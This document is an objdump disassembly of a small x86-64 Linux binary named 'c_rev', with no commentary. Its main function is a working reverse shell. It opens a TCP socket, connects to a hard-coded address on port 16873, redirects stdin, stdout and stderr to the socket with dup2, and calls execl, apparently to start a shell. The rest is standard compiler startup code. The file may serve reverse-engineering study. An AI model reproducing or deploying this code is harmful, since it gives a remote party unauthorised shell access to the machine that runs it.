
c_rev:     file format elf64-x86-64


Disassembly of section .init:

0000000000001000 <_init>:
    1000:	48 83 ec 08          	sub    $0x8,%rsp
    1004:	48 8b 05 dd 2f 00 00 	mov    0x2fdd(%rip),%rax        # 3fe8 <__gmon_start__>
    100b:	48 85 c0             	test   %rax,%rax
    100e:	74 02                	je     1012 <_init+0x12>
    1010:	ff d0                	callq  *%rax
    1012:	48 83 c4 08          	add    $0x8,%rsp
    1016:	c3                   	retq   

Disassembly of section .plt:

0000000000001020 <.plt>:
    1020:	ff 35 e2 2f 00 00    	pushq  0x2fe2(%rip)        # 4008 <_GLOBAL_OFFSET_TABLE_+0x8>
    1026:	ff 25 e4 2f 00 00    	jmpq   *0x2fe4(%rip)        # 4010 <_GLOBAL_OFFSET_TABLE_+0x10>
    102c:	0f 1f 40 00          	nopl   0x0(%rax)

0000000000001030 <htons@plt>:
    1030:	ff 25 e2 2f 00 00    	jmpq   *0x2fe2(%rip)        # 4018 <htons@GLIBC_2.2.5>
    1036:	68 00 00 00 00       	pushq  $0x0
    103b:	e9 e0 ff ff ff       	jmpq   1020 <.plt>

0000000000001040 <dup2@plt>:
    1040:	ff 25 da 2f 00 00    	jmpq   *0x2fda(%rip)        # 4020 <dup2@GLIBC_2.2.5>
    1046:	68 01 00 00 00       	pushq  $0x1
    104b:	e9 d0 ff ff ff       	jmpq   1020 <.plt>

0000000000001050 <inet_addr@plt>:
    1050:	ff 25 d2 2f 00 00    	jmpq   *0x2fd2(%rip)        # 4028 <inet_addr@GLIBC_2.2.5>
    1056:	68 02 00 00 00       	pushq  $0x2
    105b:	e9 c0 ff ff ff       	jmpq   1020 <.plt>

0000000000001060 <connect@plt>:
    1060:	ff 25 ca 2f 00 00    	jmpq   *0x2fca(%rip)        # 4030 <connect@GLIBC_2.2.5>
    1066:	68 03 00 00 00       	pushq  $0x3
    106b:	e9 b0 ff ff ff       	jmpq   1020 <.plt>

0000000000001070 <execl@plt>:
    1070:	ff 25 c2 2f 00 00    	jmpq   *0x2fc2(%rip)        # 4038 <execl@GLIBC_2.2.5>
    1076:	68 04 00 00 00       	pushq  $0x4
    107b:	e9 a0 ff ff ff       	jmpq   1020 <.plt>

0000000000001080 <socket@plt>:
    1080:	ff 25 ba 2f 00 00    	jmpq   *0x2fba(%rip)        # 4040 <socket@GLIBC_2.2.5>
    1086:	68 05 00 00 00       	pushq  $0x5
    108b:	e9 90 ff ff ff       	jmpq   1020 <.plt>

Disassembly of section .plt.got:

0000000000001090 <__cxa_finalize@plt>:
    1090:	ff 25 62 2f 00 00    	jmpq   *0x2f62(%rip)        # 3ff8 <__cxa_finalize@GLIBC_2.2.5>
    1096:	66 90                	xchg   %ax,%ax

Disassembly of section .text:

00000000000010a0 <_start>:
    10a0:	31 ed                	xor    %ebp,%ebp
    10a2:	49 89 d1             	mov    %rdx,%r9
    10a5:	5e                   	pop    %rsi
    10a6:	48 89 e2             	mov    %rsp,%rdx
    10a9:	48 83 e4 f0          	and    $0xfffffffffffffff0,%rsp
    10ad:	50                   	push   %rax
    10ae:	54                   	push   %rsp
    10af:	4c 8d 05 fa 01 00 00 	lea    0x1fa(%rip),%r8        # 12b0 <__libc_csu_fini>
    10b6:	48 8d 0d 93 01 00 00 	lea    0x193(%rip),%rcx        # 1250 <__libc_csu_init>
    10bd:	48 8d 3d c1 00 00 00 	lea    0xc1(%rip),%rdi        # 1185 <main>
    10c4:	ff 15 16 2f 00 00    	callq  *0x2f16(%rip)        # 3fe0 <__libc_start_main@GLIBC_2.2.5>
    10ca:	f4                   	hlt    
    10cb:	0f 1f 44 00 00       	nopl   0x0(%rax,%rax,1)

00000000000010d0 <deregister_tm_clones>:
    10d0:	48 8d 3d 81 2f 00 00 	lea    0x2f81(%rip),%rdi        # 4058 <__TMC_END__>
    10d7:	48 8d 05 7a 2f 00 00 	lea    0x2f7a(%rip),%rax        # 4058 <__TMC_END__>
    10de:	48 39 f8             	cmp    %rdi,%rax
    10e1:	74 15                	je     10f8 <deregister_tm_clones+0x28>
    10e3:	48 8b 05 ee 2e 00 00 	mov    0x2eee(%rip),%rax        # 3fd8 <_ITM_deregisterTMCloneTable>
    10ea:	48 85 c0             	test   %rax,%rax
    10ed:	74 09                	je     10f8 <deregister_tm_clones+0x28>
    10ef:	ff e0                	jmpq   *%rax
    10f1:	0f 1f 80 00 00 00 00 	nopl   0x0(%rax)
    10f8:	c3                   	retq   
    10f9:	0f 1f 80 00 00 00 00 	nopl   0x0(%rax)

0000000000001100 <register_tm_clones>:
    1100:	48 8d 3d 51 2f 00 00 	lea    0x2f51(%rip),%rdi        # 4058 <__TMC_END__>
    1107:	48 8d 35 4a 2f 00 00 	lea    0x2f4a(%rip),%rsi        # 4058 <__TMC_END__>
    110e:	48 29 fe             	sub    %rdi,%rsi
    1111:	48 89 f0             	mov    %rsi,%rax
    1114:	48 c1 ee 3f          	shr    $0x3f,%rsi
    1118:	48 c1 f8 03          	sar    $0x3,%rax
    111c:	48 01 c6             	add    %rax,%rsi
    111f:	48 d1 fe             	sar    %rsi
    1122:	74 14                	je     1138 <register_tm_clones+0x38>
    1124:	48 8b 05 c5 2e 00 00 	mov    0x2ec5(%rip),%rax        # 3ff0 <_ITM_registerTMCloneTable>
    112b:	48 85 c0             	test   %rax,%rax
    112e:	74 08                	je     1138 <register_tm_clones+0x38>
    1130:	ff e0                	jmpq   *%rax
    1132:	66 0f 1f 44 00 00    	nopw   0x0(%rax,%rax,1)
    1138:	c3                   	retq   
    1139:	0f 1f 80 00 00 00 00 	nopl   0x0(%rax)

0000000000001140 <__do_global_dtors_aux>:
    1140:	80 3d 11 2f 00 00 00 	cmpb   $0x0,0x2f11(%rip)        # 4058 <__TMC_END__>
    1147:	75 2f                	jne    1178 <__do_global_dtors_aux+0x38>
    1149:	55                   	push   %rbp
    114a:	48 83 3d a6 2e 00 00 	cmpq   $0x0,0x2ea6(%rip)        # 3ff8 <__cxa_finalize@GLIBC_2.2.5>
    1151:	00 
    1152:	48 89 e5             	mov    %rsp,%rbp
    1155:	74 0c                	je     1163 <__do_global_dtors_aux+0x23>
    1157:	48 8b 3d f2 2e 00 00 	mov    0x2ef2(%rip),%rdi        # 4050 <__dso_handle>
    115e:	e8 2d ff ff ff       	callq  1090 <__cxa_finalize@plt>
    1163:	e8 68 ff ff ff       	callq  10d0 <deregister_tm_clones>
    1168:	c6 05 e9 2e 00 00 01 	movb   $0x1,0x2ee9(%rip)        # 4058 <__TMC_END__>
    116f:	5d                   	pop    %rbp
    1170:	c3                   	retq   
    1171:	0f 1f 80 00 00 00 00 	nopl   0x0(%rax)
    1178:	c3                   	retq   
    1179:	0f 1f 80 00 00 00 00 	nopl   0x0(%rax)

0000000000001180 <frame_dummy>:
    1180:	e9 7b ff ff ff       	jmpq   1100 <register_tm_clones>

0000000000001185 <main>:
    1185:	55                   	push   %rbp
    1186:	48 89 e5             	mov    %rsp,%rbp
    1189:	48 83 ec 30          	sub    $0x30,%rsp
    118d:	89 7d dc             	mov    %edi,-0x24(%rbp)
    1190:	48 89 75 d0          	mov    %rsi,-0x30(%rbp)
    1194:	66 c7 45 e0 02 00    	movw   $0x2,-0x20(%rbp)
    119a:	48 8d 3d 63 0e 00 00 	lea    0xe63(%rip),%rdi        # 2004 <_IO_stdin_used+0x4>
    11a1:	e8 aa fe ff ff       	callq  1050 <inet_addr@plt>
    11a6:	89 45 e4             	mov    %eax,-0x1c(%rbp)
    11a9:	bf e9 41 00 00       	mov    $0x41e9,%edi
    11ae:	e8 7d fe ff ff       	callq  1030 <htons@plt>
    11b3:	66 89 45 e2          	mov    %ax,-0x1e(%rbp)
    11b7:	ba 00 00 00 00       	mov    $0x0,%edx
    11bc:	be 01 00 00 00       	mov    $0x1,%esi
    11c1:	bf 02 00 00 00       	mov    $0x2,%edi
    11c6:	e8 b5 fe ff ff       	callq  1080 <socket@plt>
    11cb:	89 45 fc             	mov    %eax,-0x4(%rbp)
    11ce:	48 8d 4d e0          	lea    -0x20(%rbp),%rcx
    11d2:	8b 45 fc             	mov    -0x4(%rbp),%eax
    11d5:	ba 10 00 00 00       	mov    $0x10,%edx
    11da:	48 89 ce             	mov    %rcx,%rsi
    11dd:	89 c7                	mov    %eax,%edi
    11df:	e8 7c fe ff ff       	callq  1060 <connect@plt>
    11e4:	8b 45 fc             	mov    -0x4(%rbp),%eax
    11e7:	be 00 00 00 00       	mov    $0x0,%esi
    11ec:	89 c7                	mov    %eax,%edi
    11ee:	e8 4d fe ff ff       	callq  1040 <dup2@plt>
    11f3:	8b 45 fc             	mov    -0x4(%rbp),%eax
    11f6:	be 01 00 00 00       	mov    $0x1,%esi
    11fb:	89 c7                	mov    %eax,%edi
    11fd:	e8 3e fe ff ff       	callq  1040 <dup2@plt>
    1202:	8b 45 fc             	mov    -0x4(%rbp),%eax
    1205:	be 02 00 00 00       	mov    $0x2,%esi
    120a:	89 c7                	mov    %eax,%edi
    120c:	e8 2f fe ff ff       	callq  1040 <dup2@plt>
    1211:	41 b8 00 00 00 00    	mov    $0x0,%r8d
    1217:	b9 00 00 00 00       	mov    $0x0,%ecx
    121c:	48 8d 15 ee 0d 00 00 	lea    0xdee(%rip),%rdx        # 2011 <_IO_stdin_used+0x11>
    1223:	48 8d 35 ea 0d 00 00 	lea    0xdea(%rip),%rsi        # 2014 <_IO_stdin_used+0x14>
    122a:	48 8d 3d e6 0d 00 00 	lea    0xde6(%rip),%rdi        # 2017 <_IO_stdin_used+0x17>
    1231:	b8 00 00 00 00       	mov    $0x0,%eax
    1236:	e8 35 fe ff ff       	callq  1070 <execl@plt>
    123b:	b8 00 00 00 00       	mov    $0x0,%eax
    1240:	c9                   	leaveq 
    1241:	c3                   	retq   
    1242:	66 2e 0f 1f 84 00 00 	nopw   %cs:0x0(%rax,%rax,1)
    1249:	00 00 00 
    124c:	0f 1f 40 00          	nopl   0x0(%rax)

0000000000001250 <__libc_csu_init>:
    1250:	41 57                	push   %r15
    1252:	4c 8d 3d 8f 2b 00 00 	lea    0x2b8f(%rip),%r15        # 3de8 <__frame_dummy_init_array_entry>
    1259:	41 56                	push   %r14
    125b:	49 89 d6             	mov    %rdx,%r14
    125e:	41 55                	push   %r13
    1260:	49 89 f5             	mov    %rsi,%r13
    1263:	41 54                	push   %r12
    1265:	41 89 fc             	mov    %edi,%r12d
    1268:	55                   	push   %rbp
    1269:	48 8d 2d 80 2b 00 00 	lea    0x2b80(%rip),%rbp        # 3df0 <__do_global_dtors_aux_fini_array_entry>
    1270:	53                   	push   %rbx
    1271:	4c 29 fd             	sub    %r15,%rbp
    1274:	48 83 ec 08          	sub    $0x8,%rsp
    1278:	e8 83 fd ff ff       	callq  1000 <_init>
    127d:	48 c1 fd 03          	sar    $0x3,%rbp
    1281:	74 1b                	je     129e <__libc_csu_init+0x4e>
    1283:	31 db                	xor    %ebx,%ebx
    1285:	0f 1f 00             	nopl   (%rax)
    1288:	4c 89 f2             	mov    %r14,%rdx
    128b:	4c 89 ee             	mov    %r13,%rsi
    128e:	44 89 e7             	mov    %r12d,%edi
    1291:	41 ff 14 df          	callq  *(%r15,%rbx,8)
    1295:	48 83 c3 01          	add    $0x1,%rbx
    1299:	48 39 dd             	cmp    %rbx,%rbp
    129c:	75 ea                	jne    1288 <__libc_csu_init+0x38>
    129e:	48 83 c4 08          	add    $0x8,%rsp
    12a2:	5b                   	pop    %rbx
    12a3:	5d                   	pop    %rbp
    12a4:	41 5c                	pop    %r12
    12a6:	41 5d                	pop    %r13
    12a8:	41 5e                	pop    %r14
    12aa:	41 5f                	pop    %r15
    12ac:	c3                   	retq   
    12ad:	0f 1f 00             	nopl   (%rax)

00000000000012b0 <__libc_csu_fini>:
    12b0:	c3                   	retq   

Disassembly of section .fini:

00000000000012b4 <_fini>:
    12b4:	48 83 ec 08          	sub    $0x8,%rsp
    12b8:	48 83 c4 08          	add    $0x8,%rsp
    12bc:	c3                   	retq   
